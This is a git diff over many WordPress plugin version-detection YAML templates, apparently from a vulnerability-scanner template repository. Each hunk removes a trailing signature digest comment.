a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 092d6cbf12..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032dc6d7e988de72fd3245f415e2b648269e9734599403f205497e880070fea250220560b500fda23d3b0cc7740537c29d580e6e8fc49213e737938ee16e8251c7ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index d83d9e5522..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b79524341919468ee90ac514c7ffb061b48623e1a4a16372376d2f5c1af3a00022027d066522674224616b18c10d4e6ff597bf1dae85ab28cf523fb5c2cf5996395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 6f5b4667cb..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207aae0b1e1506c5570ae02b075dfbeb44384905cacd7f30449fb0340d515070ce022100c80f21e17abe706d12f2463a6b4f13201318ad20cefd0c6b4b970459242358bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 6710f8603c..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089feb8c3d4e40c769554a8bf0027993ccd1a7e2ed9cfcb176f82749612627f080220056e97bc6b839b747d9b8254604c0d6f9ef7311098811647b81287f60fabb0d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 9bd2a5fcff..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce403eec2bd414a1d106d9a4cebe6da4c5acea9024adf14c745469d17a2c264202205c990e42a15b2f298b08dfd336bc364dbdbd279c34d321e3823b97a1dbc41027:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 96eef35345..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050abf7d0a80d7b5c00728a9b2cc6b12f5357354ba89625694c24a1c0406aff240221009120734f8471b961d91823eb2a21c76fb4c6b05b36becdbd719394d7d90f1c4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index fde28f7060..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e23fb036f84d4666a8a18d57f39397f582d58fbdad5871cbb045b090a292119802204667540039c2e50031be51b6f0438af7d253885263a24d2a5291df9d457f64a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index eca26fbcab..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fc83c8016daf960394d78607a7cf72497a5d70c7b00b93fd8e07582752cbd59022100f384b9195be98ddaffa9d802c01562c901f202f563ed281909007fc1002814c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index b68d65fd0e..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c8cf4b7cdf11ce99937079da911c8a17ffbfda8a6d85ad8e29165cf7d23fedd6022019013656548efc4fa431b72bbb56e5e8d45a61e37adcfa46ed851e02b7c24f74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index b02ff6c0f0..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c9497ce12c289b2c9210762168a67fb680feab6eb1daa126cb04ed354f1c813b022100f5ce991c753689292bfc02025ebc9039c5df2dc2ec801ea1657d576418aa48bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index a2b28c7fee..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201251bdfcabc0a14d6012bce7f39e37138e734d39cd27115d0366be60fd17e0990220114f566ea73ca0ed6bcc0a1741816fe1cbefe03365a1fd1d71ba4f42911d60bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index d794314741..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012015e7f1c1c9b1f4a40a2f4f4649ecc5b6379a2d39f4d08029e779eed62918802210085107cfc321062e1691e923453592378723ca443c7ddca59a78af372284e833c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c277784495..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d91478dc82e09af49bc65bec09ce14d38775f226996e1c5f5e77ec3566b75f65022100a00e533e5db29da92c214ab5a6ef4bc2554366e3e378f5af02d1931eea962303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 980a6f330c..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201523a384dd7872edbef7cbdbcd34f1f82b2e09d15383209f12b40a4b54fadd60022074d5b2cf3980a6ed57767a41e526505b85d60eeaf38e40644dc4f811f8e49f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 1a32a32c9b..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c789415cd0c07b9cf505e3296e3635825b5cf0bf56e56d5a5e2a2775d879d73902202f429c33e055f25cc23909eac5a6d60fec3ab6210cdd8874aa61058702c6013b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 66c6f02e93..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cbf7b2e212684858bc0fcbedfa09e979ed46f39cd1628907a18b5bb1d42e59f022100ae06da34126249ef8495f99ce64d9c2b39a038ac504864f77a8f32c81122e001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 5f2cf65692..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3c491ffbf32d42c91bfb9d75c7713ad46f66ff5cb1433a29e5d283d5350aebf022002277a640b2a47046bed10d5876f9dea1e9a5d0516f8e6673d27f5853f2e636b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index aa07811add..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220793956e4a35e319bac77323fe6aa47184bfa2d0e08caed4cb6c255e6aa8a78cb022079ed7acd29178e1cdad4792a38f4963b7f8416ca803e77c97c171acd9b13dff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 16290f846e..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016eac136d6668d3163f87f336f59d8f0abd3e2bc95e8603fcd61eb0d2c531e6702204e4f6521787d2cda15efce20d3a4cc672a38fd6b02d4b815cc1a843f509cb4d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 0d98bf8aa8..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040835db46b4718099f1d54c4e15af58e151c10dbc43c30ab2fca86b90881e08c02210088f7175496bba8fccc98978dcbbca1c4da0cd317c88b396d59745948758a86c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 15145a3da1..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008088be9cbc1142c2135c3a446b35c10d4582238e7729f3322abb340b3f9a35c40221008a7edb7efb9f4b3f6212b67a3e17a940e39551257f5322ff73ce94552494c568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 601b1d47b6..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b88a40345f97635c6433567010ad32b2f76cd277da0b83da14c40827aa0ad91b022100a525554e6327b4af677bcb0c7d7834283be93b20fabc1d2ef21f458712a1253b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 1f4634b435..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db32f645636d2cf98be7c6b179634affafc3f914f3a01936e82c6f3ca703b09c0220111ffe8f6ca36749c29a19df3949809c90f5a2e8e910d8a9ded456964dc84280:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 549d4fa468..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009881e7477a61cb1a7acf2f0885e8162de546828b454a98a0855335c34a2fd4ad022100c557ff9c63fc6957da5c1799d67650efba63d4a40462897fb082fe9895f72077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 24ecd35304..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022008ec6bf700ca6dc4efa36cf261e50e19c989d5059aaa146d6fa1a0e656d22951022100df5056592f8b4950fc6fb7ff90ad5d6b10885680ee89cb98e55694605579f43a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index f95395b94e..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071d61a270e98fdffae30b1fa918b02e25d252e45301c1df4c9e2b30b0cc8296b022100acd89b4a24a1672c1f9c4bdf0c6e5c239274eda23cf046a0844ebcef63450461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index a8738905df..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8ac7b55e9dd826391a86536728ec53e78991e26af7b6dc02cc95cfc3655f5e3022046c4d8126eb6b92195dac82faef944301bddc6101b54cbabd396e703b5cb84e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 473505e24f..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc8537b779035b9e6a2c7e88621dbfea4c8d9f8dfe2790251d373baf1584a30b022054913de97ba56b6ecce471ba279e608d1b91987e401beb44be6f16ae9b4ab4be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index f051f19e00..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c8373358b1b14b905d4a90ea7e37b4c6c1749af229c31bdc7ca711c0c08630f022100c6d55abb85af62b52670823994f3799b82276a56ba46dee3fb6e3e87b929f6d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index f0ee56e8fe..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003391693d3bf4cfa76091bdd0bf9760e5866ef562f2fec092ff7aa2b1d5ab381022071ee41ad7573af479ab2ca2231983da898e9dd6adab4c61ad1bc544f8113993d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index d0e54a20ee..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100978e9f816ec1b37ed6e1966ded892abb6e881c8ce09b853dc3cae16d2f4546ba022041e529dc26a62fc0c44a693be8d5621fd17e42fea19e536137bc380c72d72300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index da3114a6ba..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220327b372b71d6daa5332db041d2100be1e6d59336b1962debea59f23852b6319e02204081f11e253e7bf78b339da176fc52dca83a7c8cc0045b577b3787f9a3660a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index cc2236a813..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a2f8764eb7d1eb45c12d7080c1652ccb203352ddad8bbbe73a6ae79d892ede33022100cebd582e299841854e8e1a1e7baae9e1c00cd7713d760d41d9138ff9fd122aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index bae93bcedd..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200fcaa64b5b9b388aa879eb6a6613c4bfd7a57597e4f22ab9114a594bee8ae79e022072e1c2566e9d0666df425a6b4e268003b51b9c4ac681e78117c8bd689a3f8877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 13c7e9417c..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040cc56aa0cb735bb768305a6ee5d0c4978a84b7a164f783e628cd96f30d4e50b022100b8be83b11af5ec4e67e198347a1e3edbf3c218bc4dbd3d2afb2838d7f3d6abe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7634ef2734..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205002a2faea096b5079be8eed97cccd250e75f818b32b547babe9fde6865578e9022100c877489d85d815854aaae2a1a3375c80e153da5565b29c6347640c654d42b425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 076ce516bc..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202baee1d744fee7004df520e8f15a4cf1d1b63462152e6333c563d4523b0007b202204034b2a3161cebc4e8a32f1e2dba7b6f0df92addac3edb5ef985dc73e507a971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 8d6bdd3bf3..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220053bede0b07e9fd5e7df95f1933c26fad6341a076a6690a8954981faf5856aca022100e37260fba3606804514d8e027f3134296a14ada021b5bef9836b50548a2b972b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 9d3165f34c..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202593d83815bf06e7dbac2396e34c1d1ac18950447a77b40192effc88f0454c30022100ff22a694f0462fd1325000590d94c985a15701824bc3a228577ac44990cf2c8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 605fde4869..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df222fa7c1abbe23e1f1b9ce2b01e59dd346efc71acba08cd36b2d6b62a6ac33022100ae8c162cf78742314ca7238cb6012d930b171813490684190ee5bed69679fa62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index e2375bb982..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c717f6e2de3caa1c148f9643f5188403bf95d287218cc16bf4862f3997cba80022100d1a46a00590a8eb685f52f204830b2ecfca75ae312acacb68e8fb41d7a0e1d7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index e1c631ed8f..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a9045c9cd968eb2d9e33777247be8927fb6e4ef883434cdd43ce3dcd0781c670220608b9f9c5a663b1a733638ba36af63135827d9a7053cbac9d3ace6ce0a95676c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a8aee36003..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ded9ffdd4278ad43fef08163cf18a4c657ab5607d222d97c2d5986927523fa602210087c86b13b13a7fb9f4d22a6e8916780fbf07f1a1df4e5066bd45d5d42e910e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 5175ba1bde..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa117ad9b566cfe19469d87750bb516b889693636e936fc3cfd4f05f5cb301e2022043857e25a499547ed1c2d5d3e49519ec9af6bbaa7f84c38c3dfd41fe7648a6ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index f0824e3471..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca0d1d4b1ba9c2f9334f41eb61a514e2c03c614101b71c0dc4f43d5bbf73e2f5022100c9f558097c4114f7f1ed8811b43982065620c971311232518ff0bf17aab2c126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 2fa7a09165..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069eb8797e0028e8e7d506be4e902fea9b0a39195ba0f199a80b905acb449c62502210090c8f34da7b7e978cf6c49f494c1c8a2e3ae08ace501a5b81b9732680c37d08b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 02443ac4c7..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024d42d0c7c2201e636887069eaf9b54b428202e920f2e943a6099c9f39960dd4022011c64ff18c1faad70bd91a63454ce4c205b064f783de391d58c6a9b24093344b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 8be4ed4e3e..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 